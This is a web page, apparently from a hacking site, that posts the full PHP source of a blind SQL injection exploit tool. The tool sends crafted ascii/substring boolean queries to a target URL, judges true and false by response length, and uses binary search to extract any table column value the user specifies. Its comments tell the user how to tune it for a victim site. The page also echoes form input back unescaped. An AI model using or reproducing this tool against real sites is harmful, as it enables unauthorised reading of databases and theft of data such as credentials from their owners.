1. #Home
2.  | 
3. #Search
4.  | 
5. #IRC(WEB / Client)
6.  | 
7. #Categories
8.  | 
9. #Links
10.  | 
11. #About

Blind SQL Injection Exploit Tool
<html> <head><title>Blind SQL Injection Exploit</title></head> <body><center> <?php //blind sql injection exploit //coded by f3n1x //works with mssql and mysql set_time_limit(300); function sockr($j, $exp, $asc){ extract ($_POST); $port=80; $socket = fsockopen($host, $port); $inj="%20and%20ascii(substring((select%20$result%20from%20$table%20where%20$col=%27$val%27),$j,1))$exp"."$asc--"; //make sure the $inj matches the blind injection syntax on your site, if its not, modify $inj //in case the server does not allow the ' char, replace %27$val%27 with sql char function and the ascii values of $val $req="GET /$path"."$inj HTTP/1.1 \r\n"; $req.="Host: $host\r\n"; $req.="Connection: Close\r\n\r\n"; fwrite($socket, $req); while(!feof($socket)) $res.= fgets($socket, 512); fclose($socket); $ansl = strlen($res); //check the response length for true and false conditions and make the conditions in the next 2 lines for true and false match them if ($ansl>50000 && $ansl<60000) return true;//here you have to replace the values to match the TRUE condition elseif ($ansl>36000 && $ansl<40000) return false;//here you have to replace the values to match the FALSE condition } function getLength(){ $i=1; while(sockr($i,">",0)) $i++; return ($i-1); } function getValue($length){ for ($a=1;$a<=$length;$a++){ $bl=32; $bh=128; while(!sockr($a,"=",$b=intval(($bl+$bh)/2))) if (sockr($a,">",$b)) $bl=$b; else $bh=$b; $v.=chr($b);} return $v; } if(isset($_POST['host'])){ extract($_POST); if ($length=getLength()) echo $name=getValue($length); else echo "wrong condition"; } ?> <br><br> <form method="post"> <!-- wherever you need to you spaces, use the hex encryption %20 --> Host: <input type="text" name="host" value="<?php echo $host ?>">ex: www.example.com<br>Path: /<input type="text" name="path" value="<?php echo $path ?>">ex: forum/bugged.asp?id=3<br> SELECT <input type="text" name="result" value="<?php echo $result ?>"> FROM <input type="text" name="table" value="<?php echo $table ?>"> WHERE <input type="text" name="col" value="<?php echo $col ?>">='<input type="text" name="val" value="<?php echo $val ?>">' <input type="submit" value="Inject" onclick="this.value='Please Wait...';this.disabled=true"> </form></center></body></html>
Back